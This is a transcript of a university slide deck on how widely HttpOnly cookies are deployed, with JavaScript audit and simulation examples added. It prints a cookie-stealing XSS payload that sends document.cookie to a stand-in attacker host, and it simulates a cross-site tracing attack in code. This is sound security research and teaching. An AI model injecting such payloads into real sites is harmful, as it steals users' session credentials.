Why aren’t HTTP-only cookies more widely deployed?
Yuchen Zhou, David Evans
Department of Computer Science, University of Virginia
Cross-Site Scripting
Once an attacker can inject script into a page, that script can modify the DOM, disclose the user's confidential data, or install a trojan.

HTTP-only Cookies
The classic cookie-stealing XSS: the injected script reads the user's credentials through document.cookie and sends them back to the attacker, for example by requesting an image whose URL carries the cookie value (the slide's payload, written out as the script that builds that request):

    <script>
      new Image().src = "http://evilsite/stealyourcookie.cgi?value=" + encodeURIComponent(document.cookie);
    </script>

The HttpOnly attribute prevents a cookie from being read via document.cookie. The browser still sends the cookie in the Cookie header of every matching request; only script access is blocked.

Cookie without HttpOnly:
    Set-Cookie: name=value; Domain=value; Expires=value; Path=value; Secure
Cookie with HttpOnly:
    Set-Cookie: name=value; Domain=value; Expires=value; Path=value; Secure; HttpOnly
Lots of major sites still don't use HTTP-only cookies.
HTTP-only Deployment Timeline (2002 to 2010)

Server-side events:
• Django developers consider supporting HTTP-only, but compatibility concerns held them back.
• Python supports HTTP-only (2.6); an unofficial Django patch becomes available.
• Ruby on Rails supports HTTP-only (2.2.2, Nov 2008).
• Ruby on Rails sets HTTP-only on by default (2.3.2, Mar 2009).
• The TRACE method is still on by default on Apache servers and major websites [10].
• The IETF standard draft includes HTTP-only (the draft that became RFC 6265 in 2011).
• Still no official Django support for HTTP-only (2010).

Client-side and other events:
• IE6 introduces HTTP-only (2002).
• US-CERT vulnerability note on XST (cross-site tracing) attacks.
• A Firefox extension supports HTTP-only.
• Firefox 2.0.0.5 supports HTTP-only (2007).
• w3.org specifies that browsers should disallow TRACE XMLHttpRequests.
• IE8 fixes the XMLHttpRequest response-header exploit (HttpOnly cookies leaking through Set-Cookie headers readable from script).
• The TRACE method is disabled by all major browsers.
• Apache.org is compromised by cookie-stealing XSS attacks (2010).
Methodology
• 50 sites collected from the Alexa.com world top 100 popular sites.
• Manually registered accounts and collected post-login cookie properties of all sites.
• For each site: is the authentication cookie HttpOnly?
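The post-login check the methodology describes, as an added example (not code from the slides or the authors): a small Set-Cookie parser and an audit that flags authentication cookies sent without HttpOnly (readable via document.cookie) or without Secure. The header values, the cookie names and the session-name heuristic are constructed for illustration.

```javascript
// Added example (not from the slides): audit the Set-Cookie headers a site sends
// after login and report authentication cookies that lack HttpOnly (readable via
// document.cookie) or Secure (sent over plain HTTP). Sample data is constructed.

// Parse one Set-Cookie header value into name/value plus its attributes.
// Attribute names are case-insensitive (RFC 6265, section 5.2), so they are lower-cased.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  if (eq < 0) throw new Error(`malformed Set-Cookie: ${header}`);
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    httpOnly: false,
    secure: false,
    attrs: {},
  };
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const val = i < 0 ? true : attr.slice(i + 1).trim();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else cookie.attrs[key] = val;
  }
  return cookie;
}

// Heuristic (an assumption of this example): a cookie counts as an authentication
// cookie if its name matches common session-identifier patterns, or if the tester
// identified it by logging in and observing which cookie gates access.
const SESSION_NAME_RE = /^(sess|session|sid|phpsessid|jsessionid|_[a-z0-9_]*session|auth|token)/i;

function isAuthCookie(cookie, knownAuthNames = []) {
  return knownAuthNames.includes(cookie.name) || SESSION_NAME_RE.test(cookie.name);
}

// Audit a list of Set-Cookie header values. One finding per missing flag on an
// authentication cookie; an empty array means every auth cookie is protected.
function auditSetCookies(headers, knownAuthNames = []) {
  const findings = [];
  for (const header of headers) {
    const c = parseSetCookie(header);
    if (!isAuthCookie(c, knownAuthNames)) continue;
    if (!c.httpOnly) findings.push({ cookie: c.name, missing: 'HttpOnly' });
    if (!c.secure) findings.push({ cookie: c.name, missing: 'Secure' });
  }
  return findings;
}

// Constructed post-login response headers from an imaginary site.
const SAMPLE_POST_LOGIN_HEADERS = [
  'PHPSESSID=7f3a9c; Path=/; Domain=.example.test',          // auth cookie, no flags at all
  'auth_token=abc123; Path=/; Secure',                       // auth cookie, Secure but not HttpOnly
  '_example_session=deadbeef; Path=/; HttpOnly; Secure',     // auth cookie, fully flagged
  'lang=en; Path=/; Expires=Wed, 21 Oct 2015 07:28:00 GMT',  // preference cookie, script may read it
];

console.log(auditSetCookies(SAMPLE_POST_LOGIN_HEADERS));
```

Run against the constructed headers it reports three findings: PHPSESSID missing both flags and auth_token missing HttpOnly. Pointing the same audit at real captured headers requires only replacing the sample list and, where the site's session cookie has an unusual name, passing it in knownAuthNames.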
Survey Results
Of the 50 sites, 26 set no HTTP-only authentication cookies and 24 use HTTP-only authentication cookies; of those 24, 11 set the HTTP-only cookie before login and 13 after login.
Kapil Singh et al. (Oakland 2010) reported similar results on the deployment of HTTP-only cookies: 30 of the top 100 sites, and 16.2% of 100,000 sites.
Survey Results on Web Frameworks

Framework        Version   Date        HTTP-only Support   HTTP-only Default
                 1.1.1     July 2009   No
Authkit          0.4.4     July 2009   No
Repoze.who       1.0.10    2009        No
Ruby on Rails    2.3.2     Mar 2009    Yes                 Yes
Ruby on Rails    2.2.2     Nov 2008    Yes                 No
Ruby on Rails    2.1.2     Oct 2008    No
                 4.0       Feb 2010    Yes                 Yes
                 1.4       Feb 2010    Yes                 No
                 3.0       Feb 2010    No                  No

(The Rails rows are identified from the deployment timeline; framework names for the other unlabeled rows did not survive in the transcript.)
Why Aren't HTTP-only Cookies More Widely Deployed?

Page Functionality
• Does the DOM need to read cookies?
  – Only 1 site out of 50 showed a minor malfunction, in its web IM gadget (renren.com).
Can We Circumvent HTTP-only?
The injected script can no longer read the cookie through document.cookie, so it looks for another channel that returns the cookie to script:
• Cross-site tracing (XST): the browser attaches the cookie to every request, HttpOnly or not, and a TRACE request makes the server echo the whole request back, Cookie header included, where an XMLHttpRequest can read it.
• AJAX-based attacks: an XMLHttpRequest can read response headers, so a response that re-sets the cookie in Set-Cookie exposes its value to script.
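An added example (not code from the slides) that simulates cross-site tracing at the HTTP-message level in JavaScript, and also covers the server-side fix listed later under "disable TRACE": a server with TRACE enabled reflects the request, Cookie header included, so the attacker's script recovers the cookie regardless of HttpOnly; a server that refuses TRACE, or a browser that refuses to send TRACE from XMLHttpRequest, each stops it. Host name, cookie and messages are constructed, and the two server functions are stand-ins for real HTTP servers.

```javascript
// Added example (not from the slides): string-level simulation of cross-site
// tracing (XST). HttpOnly only hides the cookie from document.cookie; TRACE gives
// script the request headers back as a response body. All messages constructed.

const CRLF = '\r\n';

// Serialise an HTTP/1.1 request the way a browser puts it on the wire.
function serializeRequest(method, path, headers) {
  const lines = [`${method} ${path} HTTP/1.1`];
  for (const [k, v] of Object.entries(headers)) lines.push(`${k}: ${v}`);
  return lines.join(CRLF) + CRLF + CRLF;
}

// Split a raw HTTP message (request or response) into start line, headers, body.
function parseMessage(raw) {
  const headEnd = raw.indexOf(CRLF + CRLF);
  const head = headEnd < 0 ? raw : raw.slice(0, headEnd);
  const lines = head.split(CRLF);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { startLine: lines[0], headers, body: headEnd < 0 ? '' : raw.slice(headEnd + 4) };
}

// Server A: TRACE left enabled (the Apache default the slides complain about).
// Per RFC 2616 section 9.8 it reflects the received request as a message/http body.
function serverWithTraceEnabled(rawRequest) {
  const req = parseMessage(rawRequest);
  if (req.startLine.startsWith('TRACE ')) {
    return `HTTP/1.1 200 OK${CRLF}Content-Type: message/http${CRLF}${CRLF}${rawRequest}`;
  }
  return `HTTP/1.1 200 OK${CRLF}Content-Type: text/html${CRLF}${CRLF}<html>hello</html>`;
}

// Server B: hardened. TRACE is refused outright (what Apache's "TraceEnable off"
// does), so nothing is ever reflected.
function serverWithTraceDisabled(rawRequest) {
  const req = parseMessage(rawRequest);
  if (req.startLine.startsWith('TRACE ')) {
    return `HTTP/1.1 405 Method Not Allowed${CRLF}Allow: GET, POST${CRLF}${CRLF}`;
  }
  return serverWithTraceEnabled(rawRequest);
}

// Client-side fix: the XMLHttpRequest spec forbids CONNECT, TRACE and TRACK, and
// open() throws a SecurityError for them. Modelled as a method gate.
const XHR_FORBIDDEN_METHODS = new Set(['CONNECT', 'TRACE', 'TRACK']);
function xhrOpenAllowed(method) {
  return !XHR_FORBIDDEN_METHODS.has(method.toUpperCase());
}

// The attacker's injected script. The browser's cookie jar attaches the cookie to
// every request to the site whether or not it is HttpOnly; the script sees only
// the response. Returns the recovered Cookie header value, or null.
function xstAttack(server, cookieJar, browserEnforcesXhrMethodList) {
  if (browserEnforcesXhrMethodList && !xhrOpenAllowed('TRACE')) return null;
  const raw = serializeRequest('TRACE', '/', { Host: 'victim.test', Cookie: cookieJar });
  const res = parseMessage(server(raw));
  if (!res.startLine.startsWith('HTTP/1.1 200')) return null;
  const echoed = parseMessage(res.body);
  return echoed.headers.cookie || null;
}

// The HttpOnly flag lives in the cookie jar, not in the Cookie header, so the
// request a TRACE reflects looks the same for an HttpOnly cookie.
const JAR = 'sessionid=s3cr3t-session-value';

console.log('old browser, TRACE on :', xstAttack(serverWithTraceEnabled, JAR, false));
console.log('old browser, TRACE off:', xstAttack(serverWithTraceDisabled, JAR, false));
console.log('new browser, TRACE on :', xstAttack(serverWithTraceEnabled, JAR, true));
```

Only the first call recovers the cookie. The two fixes are independent, which is the point the deck makes about deploying at both ends: a site cannot rely on every visitor running a browser that blocks TRACE, and a browser cannot rely on every server having turned it off.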
Survey of the circumvention channels (24 sites with HTTP-only authentication cookies, 26 without):
• TRACE enabled on the server: 22 of 24 HTTP-only sites and 20 of 26 non-HTTP-only sites (TRACE disabled: 2 and 6).
• Secure attribute on the authentication cookie: 0 of 24 HTTP-only sites and 5 of 26 non-HTTP-only sites (insecure: 24 and 21).
Protection Effectiveness
HTTP-only blocks only script access to the cookie. It gives no protection against:
• Key logger
• Network packet sniffer
• Cookies read from the hard drive
• CSRF
Software Stack Compatibility
• Python didn't support HTTP-only until 2.6.
• Django is based on Python, so its deployment progress stalled.
Django developers: "Hmm, we probably can't use a patch that requires a patched python. Any different solution?"
Standards Compliance
• The cookie specification had never been updated since HTTP-only was introduced.
• Without a spec to point to, developers hesitate to make the change.
Django developers: "Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it at all."
Difficulty in Deploying at Both Ends
• Similar deployment issues: the Set-Cookie2 header of RFC 2965; updating the TCP protocol.
• Server side: add the HTTP-only field to cookies; disable TRACE and implement Set-Cookie securely.
• Client side: interpret the HTTP-only field correctly; implement the HTTP-only defense correctly.
Lessons Learned
① Maintain backward compatibility.
② Be aggressive on the client side.
③ Opt-in? Opt-out! Make HttpOnly the default and require each cookie that script must read to opt out, rather than requiring every cookie to add "; HttpOnly".
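An added example (not code from the slides) of lesson 3, which also addresses the page-functionality finding above: a Set-Cookie builder with HttpOnly and Secure on by default, per-cookie opt-out, and a refusal to opt the session cookie out. A gadget that must read something from script (the web IM case) gets its own non-HttpOnly cookie carrying only what it needs, while the session token stays unreadable. Cookie names, the user record and the document.cookie model are constructed.

```javascript
// Added example (not from the slides): HttpOnly as the default, opt-out per cookie.
// Names (sessionid, im_nick) and the user record are constructed for illustration.

const SESSION_COOKIE = 'sessionid';

// Build one Set-Cookie header value. HttpOnly and Secure are on unless the caller
// explicitly turns them off; the session cookie may never be opted out.
function buildSetCookie(name, value, options = {}) {
  const { httpOnly = true, secure = true, path = '/', domain, maxAge } = options;
  // RFC 6265 token syntax for the name; the value must not contain ';' or
  // whitespace (callers encode with encodeURIComponent when needed).
  if (!/^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/.test(name)) {
    throw new Error(`invalid cookie name: ${name}`);
  }
  if (/[;\s]/.test(value)) throw new Error("cookie value may not contain ';' or whitespace");
  if (name === SESSION_COOKIE && !(httpOnly && secure)) {
    throw new Error(`${SESSION_COOKIE} must keep HttpOnly and Secure`);
  }
  const parts = [`${name}=${value}`, `Path=${path}`];
  if (domain) parts.push(`Domain=${domain}`);
  if (Number.isInteger(maxAge)) parts.push(`Max-Age=${maxAge}`);
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// Cookies the login handler issues. The session token stays opaque to script; the
// IM gadget gets the one field it reads (the display name) in a separate cookie.
function loginResponseCookies(user) {
  return [
    buildSetCookie(SESSION_COOKIE, user.sessionToken),
    buildSetCookie('im_nick', encodeURIComponent(user.nick), { httpOnly: false }),
  ];
}

// Model of document.cookie for the cookies above: the browser leaves out every
// cookie whose HttpOnly flag is set and exposes only name=value pairs.
function documentCookieView(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Show what happens when code tries to opt the session cookie out: returns the
// error message instead of throwing so it can be displayed and checked.
function tryOptOutSession() {
  try {
    buildSetCookie(SESSION_COOKIE, 'x', { httpOnly: false });
    return null;
  } catch (e) {
    return e.message;
  }
}

const LOGIN_COOKIES = loginResponseCookies({ sessionToken: 'tok-3f9a1c', nick: 'alice smith' });
console.log(LOGIN_COOKIES);
console.log('document.cookie ->', documentCookieView(LOGIN_COOKIES));
console.log('opt-out attempt ->', tryOptOutSession());
```

With this shape the safe case is the one that needs no thought, and the exception (a cookie script legitimately reads) is visible in code review as an explicit `httpOnly: false`.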
Questions?
Thank you!
Backup Slides
• Survey Results: Kapil Singh et al. (Oakland 2010) also found similar results on the deployment of HTTP-only cookies.
• Survey Results on More Sites
• Page Functionality: Google Analytics?